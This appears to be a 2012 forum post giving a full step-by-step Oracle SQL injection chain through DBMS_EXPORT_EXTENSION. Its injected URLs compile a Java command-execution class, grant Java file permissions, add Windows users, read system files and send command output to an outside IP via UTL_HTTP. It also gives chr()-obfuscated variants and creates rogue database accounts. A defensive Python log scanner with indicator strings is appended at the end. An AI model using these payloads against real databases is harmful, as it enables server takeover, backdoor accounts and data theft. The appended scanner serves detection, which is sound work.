Worked demonstration: the full process of obtaining a cmdshell through Oracle injection

Posted 2012-12-18 12:21:48
All of the demonstrations below were executed in SQL*Plus over the web. For web injection, change select SYS.DBMS_EXPORT_EXTENSION..... into

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

and that form will do. (The " 'a'|| " is there so that the statement returns true.)
The statement is fairly long, so it may have to be submitted via POST.
The steps are as follows:

1. Create the package
By injecting the SYS.DBMS_EXPORT_EXTENSION function, create the Java package LinxUtil on Oracle, containing two functions: runCMD executes system commands and readFile reads files:

/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual

------------------------
If the URL has a length limit, the readFile() function block can be dropped, i.e.:

/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual

Also drop the statements in the later steps that deal with readFile().
------------------------------
2. Grant the Java permission
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual

3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual

4. Grant public the privilege to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual

5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)

6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)

Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the output of a run, use union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
or UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
Note: when using UTL_HTTP.request, use REPLACE() to substitute the spaces and newlines, otherwise the HTTP request cannot be submitted. utl_encode.base64_encode also works.
--------------------
6. Internal changes
The changes to the all_objects table can be viewed with the following command:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. Drop the functions we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
End of article. Dedicated to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test for the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
Confirm the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
Grant linxsql the connect privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following method creates a function Linx_query() that can execute multiple statements; on success it returns the number "1". But its privileges are inherited and may be only public privileges, so it seems of little use; if you really need it, consider grant dba to the current user:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
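On the defensive side, as an added example that is not part of the original post: a Python scanner over web access-log lines that URL-decodes each request, expands chr()||chr() chains like the one used in the account-creation variant above, and reports which markers of this injection chain (DBMS_EXPORT_EXTENSION, the nested EXECUTE IMMEDIATE, dbms_java.grant_permission, Java source creation, UTL_HTTP.request) a request contains. The log lines, addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Markers of the DBMS_EXPORT_EXTENSION chain described on this page: the injected
# call, the nested EXECUTE IMMEDIATE, Java source creation, Java grants, UTL_HTTP exfil.
INDICATORS = (
    "DBMS_EXPORT_EXTENSION",
    "GET_DOMAIN_INDEX_TABLES",
    "EXECUTE IMMEDIATE",
    "DBMS_JAVA.GRANT_PERMISSION",
    "COMPILE JAVA SOURCE",
    "LANGUAGE JAVA NAME",
    "UTL_HTTP.REQUEST",
)
# A single chr(N) term, and a run of them joined by ||, e.g. chr(70)||chr(79)||chr(79)
CHR_TERM = re.compile(r"chr\(\s*(\d+)\s*\)", re.IGNORECASE)
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\|\|\s*chr\(\s*\d+\s*\))*", re.IGNORECASE)


def decode_chr_chains(text: str) -> str:
    """Replace every chr(N)||chr(N)... chain with the literal string it builds."""
    def expand(match):
        return "".join(chr(int(n)) for n in CHR_TERM.findall(match.group(0)))
    return CHR_CHAIN.sub(expand, text)


def normalise(request_line: str) -> str:
    """URL-decode, expand chr() chains, collapse whitespace and upper-case one request."""
    text = decode_chr_chains(unquote_plus(request_line))
    return " ".join(text.split()).upper()


def scan(request_line: str) -> list:
    """Indicators present in one logged request (empty list if clean)."""
    text = normalise(request_line)
    return [ind for ind in INDICATORS if ind in text]


def scan_log(lines) -> list:
    """(line_number, indicators) for every line matching at least one indicator."""
    return [(n, found) for n, line in enumerate(lines, 1) if (found := scan(line))]


# Constructed sample access-log lines (not from the original post): a normal request,
# the injected select in clear text, and the same call with chr()-encoded arguments.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Dec/2012:12:21:48 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Dec/2012:12:22:03 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27%7C%7C(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(:P1);EXECUTE%20IMMEDIATE%20... HTTP/1.1" 500 0',
    '10.0.0.9 - - [18/Dec/2012:12:25:41 +0800] "GET /xxx.jsp?id=1%20and%201%3C%3E(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||... HTTP/1.1" 500 0',
]
```

Running scan_log(SAMPLE_LOG) flags lines 2 and 3 only; line 3 is caught solely because the chr() chains are expanded first, since the raw line never contains the text EXECUTE IMMEDIATE.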